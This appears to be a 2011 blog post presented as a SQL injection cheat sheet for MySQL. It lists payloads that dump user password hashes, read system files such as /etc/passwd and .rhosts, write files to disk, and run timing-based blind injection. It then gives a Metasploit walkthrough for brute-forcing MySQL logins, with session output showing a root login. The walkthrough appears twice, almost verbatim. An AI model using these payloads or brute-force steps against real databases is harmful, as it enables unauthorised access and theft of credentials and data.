| Payload | Description (if any) |
| select @@version; | View database version. |
| select host,user,db from mysql.db; | Misc. information disclosure |
| select host,user,password from mysql.user; | View MySQL usernames and passwords. |
| create table myfile (input TEXT); load data infile ‘/etc/passwd’ into table myfile; OR load data infile ‘/home/{user}/.rhosts’ into table myfile; select * from myfile; | Reading files on the filesystem. |
| select host,user,password from user into outfile ‘/tmp/passwd’; | Write files on the filesystem. This attack is limited by the fact that you can only write to either “/tmp” or “/var/tmp”. |
| select CONCAT(”a”,”b”); | Concat strings for blind SQL Injection tests. |
| BENCHMARK(1000000000,MD5(’gainingtime’)) | Cause delay for blind SQL Injection tests. |
| BENCHMARK(1000000000,MD5(CHAR(116))) | Cause delay for blind SQL Injection tests. Same as before, but this can be used if quotes are filtered. |
| IF EXISTS (SELECT * FROM users WHERE username = ‘root’) BENCHMARK(1000000000,MD5(’gainingtime’)) | Check if username exists, if yes there will be an delay. |
| IF EXISTS (SELECT * FROM users WHERE username = ‘root’) WAITFOR DELAY ‘0:0:3′ | Check if username exists, if yes there will be an delay for 3 seconds. |
Sunday, January 16, 2011
SQL injection Cheatseet
*Mysql
BruteForce Mysql using Metasploit
#open port 3306 ( mysql ) in victim
#create file ex.PASS.txt that contain many password
#create file ex.USERS.txt that contain many users
here we go .........................................................................
msf > use scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set PASS_FILE /root/pass.txt
PASS_FILE => /root/password.txt
msf auxiliary(mysql_login) > set USER_FILE /root/users.txt
USER_FILE => /root/users.txt
msf auxiliary(mysql_login) > set RHOSTS 127.0.0.1 //example
RHOSTS => 127.0.0.1
msf auxiliary(mysql_login) >show options
msf auxiliary(mysql_login) > exploit
[*] 127.0.0.1:3306 - Found remote MySQL version 5.1.41
[*] 127.0.0.1:3306 Trying username:'admin' with password:''
[*] 127.0.0.1:3306 failed to login as 'admin' with password ''
[*] 127.0.0.1:3306 Trying username:'root' with password:"
[+] 127.0.0.1:3306 - SUCCESSFUL LOGIN 'root' : 'root'
********************************************************************************
# mysql -h 127.0.0.1 -u root -proot
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 53
Server version:
version: 5.1.41-3ubuntu12 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
+--------------------+
2 rows in set (0.01 sec)
mysql>
./finished
#create file ex.PASS.txt that contain many password
#create file ex.USERS.txt that contain many users
here we go .........................................................................
msf > use scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set PASS_FILE /root/pass.txt
PASS_FILE => /root/password.txt
msf auxiliary(mysql_login) > set USER_FILE /root/users.txt
USER_FILE => /root/users.txt
msf auxiliary(mysql_login) > set RHOSTS 127.0.0.1 //example
RHOSTS => 127.0.0.1
msf auxiliary(mysql_login) >show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true yes Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE /root/pass.txt no File containing passwords, one per line
RHOSTS 127.0.0.1 yes The target address range or CIDR identifier
RPORT 3306 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_FILE /root/users.txt no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attemptsmsf auxiliary(mysql_login) > exploit
[*] 127.0.0.1:3306 - Found remote MySQL version 5.1.41
[*] 127.0.0.1:3306 Trying username:'admin' with password:''
[*] 127.0.0.1:3306 failed to login as 'admin' with password ''
[*] 127.0.0.1:3306 Trying username:'root' with password:"
[+] 127.0.0.1:3306 - SUCCESSFUL LOGIN 'root' : 'root'
********************************************************************************
# mysql -h 127.0.0.1 -u root -proot
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 53
Server version:
version: 5.1.41-3ubuntu12 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
+--------------------+
2 rows in set (0.01 sec)
mysql>
./finished
Subscribe to:
Posts (Atom)